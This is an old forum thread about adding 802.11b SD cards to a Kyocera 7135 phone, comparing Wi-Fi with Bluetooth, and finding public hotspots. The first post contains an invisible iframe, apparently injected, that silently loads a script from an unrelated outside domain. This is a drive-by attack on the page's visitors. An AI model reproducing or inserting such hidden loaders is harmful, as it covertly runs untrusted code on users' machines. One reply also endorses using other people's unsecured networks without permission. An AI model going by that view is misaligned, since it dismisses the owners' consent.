+ Reply to Thread
Page 1 of 2 1 2 LastLast

Thread: 7135 w/802.11b

7135 w/802.11b

Is it possible to add an 802.11b SD card to the 7135 so you can attach to wireless networks?

It would be great if I could use it to check my e-mail and do some limited web browsing at home and when I'm near an access point at work, without using my minutes.

Ernest<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Back in June/July, this card was slated for release late this year or early next. It will support Palm 4.X.

http://www.sychip.com/wlan-module.html

Andy

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

sychip

That looks interesting............
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

Re: 7135 w/802.11b

Originally posted by edstalnaker
    Is it possible to add an 802.11b SD card to the 7135 so you can attach to wireless networks?

It would be great if I could use it to check my e-mail and do some limited web browsing at home and when I'm near an access point at work, without using my minutes.

Ernest
    Ditto. Bluetooth is another possibility. Anything to cut the wires and stay connected

Definately possible ... as soon as a SDIO 802.11 card is released. Bluetooth is another possibility. Anything to cut the wires and stay connected

Bluetooth Headset with the 7135

I have the Kyocera 7135 and the Plantronics M1500 Bluetooth headset. I have called Kyocera, Plantronics and Palm to find out if the Palm Bluetooth card will work in place of the extra adapter on the Plantronics headset. I have been unable to get an answer from any company. Does anyone have any ideas?

Re: Bluetooth Headset with the 7135

Originally posted by robertfeathers
    I have the Kyocera 7135 and the Plantronics M1500 Bluetooth headset. I have called Kyocera, Plantronics and Palm to find out if the Palm Bluetooth card will work in place of the extra adapter on the Plantronics headset. I have been unable to get an answer from any company. Does anyone have any ideas?
    I can tell you that the Palm bluetooth card does not have a headset profile, which is the first requirement. It is unclear if it will work if a driver is written (can the phone circuit communicate with the SD slot, or is it strictly for Palm apps? Depends on how tight the integration really is. No one seems to be able to answer. I am hoping it becomes clear when the SDK is released).

Another board member started a dialog with TDK to see if they would produce a bluetooth dongle for the hotsync port which might be less intrusive then something hanging off the headset port, and that could do Bluetooth serial emulation as well as headset functions.

Alan

Back in June/July, this card was slated for release late this year or early next. It will support Palm 4.X.

http://www.sychip.com/wlan-module.html

This would be an cool little feature. I wonder what kind of range this card has? And how much it will cost? I downloaded the .pdf for the SD card version but haven't had time to thoroughly examine it yet.

I'd like to be able to hotsync wirelessly, but since Apple dropped IR from the PowerBooks this and bluetooth are my only options. I wasn't too hapy with IR anyway, too slow and picky about having the ports directly in line and at just the right distance away.
    Sorry, but I no longer make 7135 headset adapters.

Don't remember the specs exactly but I know that 802.11b has a longer range that bluetooth. The way I understand it is that bluetooth is more for headsets and pc accessories while Wi-Fi was designed more for networking.
    The SyChip card is definately intriguing. I'd love to browse the internet using my cable modem connection. No minutes and faster than express network. HotSync has commented that the 33mhz processor may not be able to handle a connection that fast though. depending on price, i'd love to find out.

Yes, 802.11b does have a much longer range than bluetooth. My Apple AirPort has a range of approx. 1 city block, while bluetooth only reaches a few yards.

What I was wondering is what kind of range this little SD card could get with its tiny antenna. Even if it is only ~50 ft. that would be plenty for my intended use.
    Sorry, but I no longer make 7135 headset adapters.

Regarding 802.11b vs Bluetooth.

They are different beasts, with different, though overlapping purposes.

802.11b - Long range (100m).
    Bluetooth - Short range (10m).

802.11b - High power Consumption (= drains battery faster)
    Bluetooth - Low Power Consumption

802.11b - Replace ethernet card/cable.
    Bluetooth - Replace USB/serial/parallel cables.

802.11b - 2.4GHz
    Bluetooth - 2.4GHz (hmmm ... same as cordless phones in US)

802.11b - 11/22Mbps
    Bluetooth - 2Mbps

802.11b - Network access via a wireless router/hub.
    Bluetooth - Network access as a profile (effectivley PPP) via a connected PC or cellphone.

Basically, 802.11b was intended as a long range, ethernet replacement in a Wide Area Network (WAN) environment.

Bluetooth, was intended as a low power, short range replacment for cables attached to devices in a Personal Area Network (PAN).

Different beasts with different purposes. I loved walking into my office at home and work, and having my (now dead) T68 sync contacts and appointments. Looking forward to doing the same with a 7135 and the appropriate cards.

New WLAN Card Boosts PDA Power

Check this breaking news. See link.

http://story.news.yahoo.com/news?tmpl=story&u=/nf/20030123/bs_nf/20554

Especially love the part:
    During a press conference at the recent International Consumer Electrics Show (CES) in Las Vegas, Nevada, SanDisk announced that it will use SyChip's WLAN6060SDNIC design in its new SanDisk Connect product line. The tiny, low power-consumption cards are removable and will be shipped in both non-memory and 256 MB flash memory versions.

OK...since we're talking about the 802.11b stuff. I have one of those networks set up at home and I love it. But that's not the point.
    I keep hearing you can use the 802.11b at airports and public places and such. Anybody ever tried that? Can I sit with my laptop at an airport, and ta-ta..have internet access through my wireless network card?

Dagi

Originally posted by Dagi
    OK...since we're talking about the 802.11b stuff. I have one of those networks set up at home and I love it. But that's not the point.
    I keep hearing you can use the 802.11b at airports and public places and such. Anybody ever tried that? Can I sit with my laptop at an airport, and ta-ta..have internet access through my wireless network card?

Dagi
    The answer to that is "it depends". some areas are setting up free WiFi networks. You just boot up, turn OFF Wep, and you are on. (you either need to know the SSID or have software that can pull it off the air).

Most of the services being announced for airports and other public places, you need software on the laptop and an account, which you either pay a flat rate per month, or by megabyte.

See http://www.boingo.com/ as an example...

There are also TONS of unsecured WiFi networks out there. These are typically not intentional, just people who bought gateways and didn't read the manual to know that they need to set up some security or anyone within range can "borrow" their bandwidth.

In edition, the built in security of WiFi (WEP) has turned out to not be too secure and is easily cracked.

These last two access methods are of course open to opinion of whether it is morally correct to utilize an unsecured network where the owner is not intentionally providing service. In the case of a user who didn't even TRY to make it secure, I lean toward feeling they should lose some bandwidth to passers by just as a lesson, but if they have taken the effort to attempt to secure their network, even though the security may not be effective, they should be left alone. YMMV.

Alan

For the unintentional stuff, you can use www.netstumbler.com
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    For the unintentional stuff, you can use www.netstumbler.com
    Unfortunately, there are no versions of netstumbler/ministumbler (or similar) available. The 7135 would be a perfect platform with a SDIO 802.11b card in combination with the gpsOne/aGPS capability of the 7135.

BUT, another cool option wuold be to have an app that takes the co-ordinates from your gpsOne signal, goes wireless via QNC/Express/WAP/whatever, and looks up a hotspot nearby based on your location. It will always be a more enjoyable experience networking at 11MBps than 56k.

SDIO Wireless Cards

I've been looking for one of these for a while, and been trying to get more info out of SyChip as well (for a embedded project). So far, they haven't returned any of my calls.

Probably more useful to consumers, SanDisk just announced this:

http://www.sandisk.com/pressrelease/030109_wifi.htm

So looks like march for a plain SD 802.11b card, mid-year for the combo memory/WiFi card.

Originally posted by Token User
    Unfortunately, there are no versions of netstumbler/ministumbler (or similar) available.
    I know, I was talking about for laptops.

Yeah, a MiniStumbler would be great. Or even MiniBoingo.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    I know, I was talking about for laptops.

Yeah, a MiniStumbler would be great. Or even MiniBoingo.
    Hmmm. MiniBoingo - haven't checked them out in awhile ... I wonder if they support the D-Link cards now. Looks like I gotta go googling.

I was just making that up. I don't know if there are any "mini" Boingoes or NetStumblers out there in real life.
    ~'kito
    pdaPhoneHome Moderator